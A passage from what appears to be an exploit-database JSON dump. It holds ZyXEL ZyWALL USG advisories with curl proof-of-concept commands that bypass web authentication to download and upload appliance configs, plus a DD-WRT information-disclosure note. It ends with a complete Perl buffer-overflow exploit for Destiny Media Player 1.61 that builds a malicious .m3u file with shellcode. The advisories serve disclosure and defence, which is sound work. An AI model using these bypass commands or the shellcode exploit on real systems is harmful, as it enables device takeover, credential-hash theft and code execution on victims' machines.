db/etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 db/etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-30 04:48 etc_writable/\r\n 0 2010-09-30 04:48 etc_writable/budget/\r\n 0 2010-09-14 15:08 etc_writable/budget/budget.conf\r\n 0 2010-09-15 06:28 etc_writable/firmware-upgraded\r\n 81 2010-09-14 15:09 etc_writable/myzyxel_info.conf\r\n 243 2010-09-14 15:03 etc_writable/tr069ta.conf\r\n 0 2010-09-30 04:48 etc_writable/zyxel/\r\n 0 2010-09-30 04:48 etc_writable/zyxel/conf/\r\n 996 2010-09-15 06:28 etc_writable/zyxel/conf/__eps_checking_default.xml\r\n 42697 2010-09-14 14:46 etc_writable/zyxel/conf/__system_default.xml\r\n 95 2010-09-30 04:48 filechecksum\r\n 1023 2010-09-30 04:48 filelist\r\n 336 2010-09-30 04:48 fwversion\r\n 50 2010-09-15 06:34 kernelchecksum\r\n 3441664 2010-09-30 04:48 kernelusg20.bin\r\n 0 2010-09-14 14:46 wtp_image/\r\n --------- -------\r\n 43569823 24 files\r\n \r\n $ unzip -l 221BDQ2C0.db\r\n Archive: 221BDQ2C0.db\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 0 2009-07-29 04:44 db_remove_lst\r\n 0 2010-09-15 06:28 etc/\r\n 0 2010-09-15 06:35 etc/idp/\r\n 39 2010-09-14 16:08 etc/idp/all.conf\r\n 25 2010-09-14 16:08 etc/idp/attributes.txt\r\n 639 2010-09-14 16:08 etc/idp/attributes_self.txt\r\n 277 2010-09-14 16:08 etc/idp/device.conf\r\n 39 2010-09-14 16:08 etc/idp/dmz.conf\r\n 39 2010-09-14 16:08 etc/idp/lan.conf\r\n 39 2010-09-14 16:08 etc/idp/none.conf\r\n 60581 2010-09-14 16:08 etc/idp/self.ref\r\n 5190 2010-09-14 16:08 etc/idp/self.rules\r\n 0 2010-09-14 16:08 etc/idp/update.ref\r\n 0 2010-09-14 16:08 etc/idp/update.rules\r\n 39 2010-09-14 16:08 etc/idp/wan.conf\r\n 445075 2010-09-14 16:08 etc/idp/zyxel.ref\r\n 327 2010-09-14 16:08 etc/idp/zyxel.rules\r\n 0 2010-09-14 16:05 etc/zyxel/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/dha_idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/trusted/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/dev/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/packet_trace/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/script/\r\n 1256 2010-09-15 06:35 filelist\r\n --------- -------\r\n 520939 31 files\r\n \r\nDuring a penetration test it was discovered that the file\r\n\"221BDQ2C0.conf\" (from the unencrypted firmware zip file) has exactly\r\nthe same size as the file \"system-default.conf\" contained in each\r\nencrypted zip. This can be successfully used for a known-plaintext\r\nattack[1] against these files, afterwards the decrypted zip-files can be\r\nextracted. However, please note that this attack only allows decrypting\r\nthe encrypted zip files, the password used for encrypting the files in\r\nthe first place is not revealed.\r\n \r\nAmong others, the following programs implement this attack:\r\n \r\n * PkCrack by Peter Conrad [2]\r\n * Elcomsoft Advanced Archive Password Recovery [3]\r\n \r\nAfterwards, the file \"compress.img\" from \"221BDQ2C0.bin\" can be\r\ndecompressed (e.g. by using the program \"unsquashfs\"), revealing the\r\nfilesystem for the appliance.\r\n \r\n \r\nWeb-Interface Authentication Bypass\r\n-----------------------------------\r\n \r\nZyWALL USG appliances can be managed over a web-based administrative\r\ninterface offered by an Apache http server. The interface requires\r\nauthentication prior to any actions, only some static files can be\r\nrequested without authentication.\r\n \r\nA custom Apache module \"mod_auth_zyxel.so\" implements the\r\nauthentication, it is configured in etc/service_conf/httpd.conf in the\r\nfirmware (see above). Several Patterns are configured with the directive\r\n\"AuthZyxelSkipPattern\", all URLs matching one of these patterns can be\r\naccessed without authentication:\r\n \r\n AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language\r\n \r\nThe administrative interface consists of several programs which are\r\ncalled as CGI scripts. For example, accessing the following URL after\r\nlogging in with an admin account delivers the current startup\r\nconfiguration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\nThe Apache httpd in the standard configuration allows appending\r\narbitrary paths to CGI scripts. The server saves the extra path in the\r\nenvironment variable PATH_INFO and executes the CGI script (this can be\r\ndisabled by setting \"AcceptPathInfo\" to \"off\"[4]). Therefore, appending\r\nthe string \"/images/\" and requesting the following URL also executes the\r\n\"export-cgi\" script and outputs the current configuration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\r\n \r\nDuring the penetration test it was discovered that for this URL, no\r\nauthentication is necessary (because the string \"/images/\" is included\r\nin the path-part of the URL) and arbitrary configuration files can be\r\ndownloaded. The file \"startup-config.conf\" can contain sensitive data\r\nlike firewall rules and hashes of user passwords. Other interesting\r\nconfig-file names are \"lastgood.conf\" and \"systemdefault.conf\".\r\n \r\nThe administrative interface furthermore allows uploading of\r\nconfiguration files with the \"file_upload-cgi\" script. Applying the\r\nsame trick (appending \"/images/\"), arbitrary configuration files can be\r\nuploaded without any authentication. When the chosen config-file name\r\nis set to \"startup-config.conf\", the appliance furthermore applies all\r\nsettings directly after uploading. This can be used to add a second\r\nadministrative user with a self-chosen password and take over the\r\nappliance.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nThe current startup-config.conf file from a ZyWALL USG appliance can be\r\ndownloaded by accessing the following URL, e.g. with the program cURL:\r\n \r\n $ curl --silent -o startup-config.conf \\\r\n \"https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\"\r\n \r\nThis file can be re-uploaded (e.g. after adding another administrative\r\nuser) with the following command, the parameter \"ext-comp-1121\" may need\r\nto be adjusted:\r\n \r\n $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 \\\r\n -F \"file_path=@startup-config.conf;filename=startup-config.conf\" \\\r\n https://192.168.0.1/cgi-bin/file_upload-cgi/images/\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or else\r\nensure that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nAny attackers who are able to access the administrative interface of\r\nvulnerable ZyWALL USG appliances can read and write arbitrary configuration\r\nfiles, thus compromising the complete appliance. Therefore the risk is\r\nestimated as high.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-07 First reactions of vendor, issue is being investigated\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n \r\n \r\nReferences\r\n==========\r\n \r\n[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz\r\n[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html\r\n[3] http://www.elcomsoft.com/archpr.html\r\n[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo\r\n \r\n \r\nRedTeam Pentesting GmbH\r\n=======================\r\n \r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n \r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n \r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n \r\n \r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u00c3\u00a4ftsf\u00c3\u00bchrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck\r\n \r\n \r\nAdvisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web\r\n Interface\r\n \r\nThe ZyXEL ZyWALL USG appliances perform parts of the authorization for\r\ntheir management web interface on the client side using JavaScript. By\r\nsetting the JavaScript variable \"isAdmin\" to \"true\", a user with limited\r\naccess gets full access to the web interface.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Client Side Authorization\r\nSecurity Risk: medium\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-004\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nUsers with the role \"limited-admin\" are allowed to log into the\r\nweb-based administrative interface and configure some aspects of a\r\nZyWALL USG appliance. It is usually not possible to download the current\r\nconfiguration file, as this includes the password-hashes of all users.\r\nWhen the \"download\" button in the File Manager part of the web interface\r\nis pressed, a JavaScript dialogue window informs the user that this\r\noperation is not allowed. However, setting the JavaScript variable\r\n\"isAdmin\" to \"true\" (e.g. by using the JavaScript console of the\r\n\"Firebug\" extension for the Firefox web browser) disables this check and\r\nlets the user download the desired configuration file. It is also\r\npossible to directly open the URL that downloads the configuration file.\r\nThe appliances do not check the users' permissions on the server side.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nAfter logging into the web interface, set the local JavaScript variable\r\n\"isAdmin\" to \"true\" and use the File Manager to download configuration\r\nfiles. Alternatively, the current configuration file (including the\r\npassword hashes) can also be downloaded directly by accessing the\r\nfollowing URL:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or ensure\r\notherwise that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nThis vulnerability enables users of the role \"limited-admin\" to access\r\nconfiguration files with potentially sensitive information (like the\r\npassword hashes of all other users). The risk of this vulnerability is\r\nestimated as medium.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/16040", "hash": "cfb798c1c3fc0e4415abc38f924e89f472adf671938f81d453e66c17f2b89d85"}, {"lastseen": "2016-04-19T09:58:28", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "Craig Heffner", "published": "2010-12-29T00:00:00", "type": "zdt", "title": "DD-WRT Information Disclosure Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-12-29T00:00:00", "href": "http://0day.today/exploit/description/15103", "id": "1337DAY-ID-15103", "sourceData": "# Author: Craig Heffner, /dev/ttyS0\r\n# Software Link: http://www.dd-wrt.com\r\n# Version: v24-preSP2\r\n# Tested on: builds 14311, 14896\r\n \r\nRemote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate MAC address geolocation (see: http://samy.pl/mapxss/). This is exploitable even if remote administration is disabled.\r\n \r\nUsers who enable remote administration typically set the info page to 'disabled' or 'enabled with authentication' in order to prevent remote users from obtaining this information without first authenticating to the router. However, if the info page is set to 'disabled', the /Info.live.htm page can still be accessed directly by an unauthenticated remote attacker, which returns the following data:\r\n \r\n{lan_mac::00:22:B0:9B:1C:D3}\r\n{wan_mac::00:22:B0:9B:1C:D4}\r\n{wl_mac::00:22:B0:9B:1C:D5}\r\n{lan_ip::192.168.1.1}\r\n{wl_channel::6}\r\n{wl_radio::Radio is On}\r\n{wl_xmit::71 mW}\r\n{wl_rate::270 Mbps}\r\n{packet_info::SWRXgoodPacket=\r\n0;SWRXerrorPacket=0;SWTXgoodPacket=302;SWTXerror\r\nPacket=17;}\r\n{wl_mode_short::ap}\r\n{lan_proto::dhcp}\r\n{mem_info::,'total:','used:','free:','shared:','buffers:','cached:','Mem:','13316096','11509760','1806\r\n336','0','1556480','4431872','Swap:','0','0','0','MemTotal:','13004','kB','MemFree:','1764','kB','Me\r\nmShared:','0','kB','Buffers:','1520','kB','Cached:','4328','kB','SwapCached:','0','kB','Active:','4136'\r\n,'kB','Inactive:','1724','kB','HighTotal:','0','kB','HighFree:','0','kB','LowTotal:','13004','kB','LowFr\r\nee:','1764','kB','SwapTotal:','0','kB','SwapFree:','0','kB'}\r\n{active_wireless::}\r\n{active_wds::}\r\n{dhcp_leases:: 'joes-desktop','192.168.1.102','xx:xx:xx:xx:2E:41','1 day 00:00:00','102'}\r\n{dhcp_leases:: 'marys-laptop','192.168.1.105','xx:xx:xx:xx:55:E2','1 day 00:00:00','105'}\r\n{uptime:: 01:35:40 up 8 min, load average: 1.60, 0.80, 0.36}\r\n{ipinfo:: IP: 1.1.1.1}\r\n{wan_ipaddr::1.1.1.1}\r\n{gps_text::}\r\n{gps_lat::}\r\n{gps_lon::}\r\n{gps_alt::}\r\n{gps_sat::}\r\n \r\n \r\nSince DD-WRT is also vulnerable to a public IP DNS rebinding attack, this vulnerability affects routers that have remote administration disabled as well, and can be exploited by any Web site that is viewed by an internal, unauthenticated user. The Rebind tool easily facilitates this type of rebinding attack (http://rebind.googlecode.com).\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/15103", "hash": "93a8ed40744e5f59b51395f425afe35d8af417104aee5613457032344a7ab130"}, {"lastseen": "2016-04-20T01:41:46", "references": [], "edition": 1, "description": "Exploit for windows platform in category local exploits", "reporter": "ZoRLu", "published": "2010-08-07T00:00:00", "type": "zdt", "title": "Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-07T00:00:00", "id": "1337DAY-ID-13613", "href": "http://0day.today/exploit/description/13613", "sourceData": "=============================================================\r\nDestiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit\r\n=============================================================\r\n\r\n#!/usr/bin/perl\r\n# Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit(.pl)\r\n# Exploit Coded By ZoRLu / admin@yildirimordulari.com\r\n# Date: 07/08/2010\r\n# Tested on my XP pc: http://img530.imageshack.us/img530/336/dest.jpg\r\n# Home: z0rlu.blogspot.com\r\n# Home: imhatimi.org\r\n# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N\r\n \r\nmy $karala = \"\\x90\" x 2052;\r\n#C:\\Documents and Settings\\Administrator\\Desktop\\find>Findjmp.exe kernel32.dll esp\r\n#0x7C86467B jmp esp\r\nmy $blah = \"\\x7B\\x46\\x86\\x7C\"; \r\nmy $fiytiripat = \"\\x90\" x 12;\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\r\nmy $shellcode =\r\n\"\\x31\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x38\".\r\n\"\\x78\\x73\\x8a\\x83\\xeb\\xfc\\xe2\\xf4\\xc4\\x90\\x37\\x8a\\x38\\x78\\xf8\\xcf\".\r\n\"\\x04\\xf3\\x0f\\x8f\\x40\\x79\\x9c\\x01\\x77\\x60\\xf8\\xd5\\x18\\x79\\x98\\xc3\".\r\n\"\\xb3\\x4c\\xf8\\x8b\\xd6\\x49\\xb3\\x13\\x94\\xfc\\xb3\\xfe\\x3f\\xb9\\xb9\\x87\".\r\n\"\\x39\\xba\\x98\\x7e\\x03\\x2c\\x57\\x8e\\x4d\\x9d\\xf8\\xd5\\x1c\\x79\\x98\\xec\".\r\n\"\\xb3\\x74\\x38\\x01\\x67\\x64\\x72\\x61\\xb3\\x64\\xf8\\x8b\\xd3\\xf1\\x2f\\xae\".\r\n\"\\x3c\\xbb\\x42\\x4a\\x5c\\xf3\\x33\\xba\\xbd\\xb8\\x0b\\x86\\xb3\\x38\\x7f\\x01\".\r\n\"\\x48\\x64\\xde\\x01\\x50\\x70\\x98\\x83\\xb3\\xf8\\xc3\\x8a\\x38\\x78\\xf8\\xe2\".\r\n\"\\x04\\x27\\x42\\x7c\\x58\\x2e\\xfa\\x72\\xbb\\xb8\\x08\\xda\\x50\\x88\\xf9\\x8e\".\r\n\"\\x67\\x10\\xeb\\x74\\xb2\\x76\\x24\\x75\\xdf\\x1b\\x12\\xe6\\x5b\\x78\\x73\\x8a\";\r\n\r\nopen(myfile,'>>zrl.m3u');\r\nprint myfile $karala.$blah.$fiytiripat.$shellcode;\r\nclose(myfile)\r\n\r\n\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/13613", "cvss": {"score": 0, "vector": "NONE"}, "hash": "13719a090c8286b862c94076dacf235e6460798e3bb0e4c713568369b7bcd83d"}]}}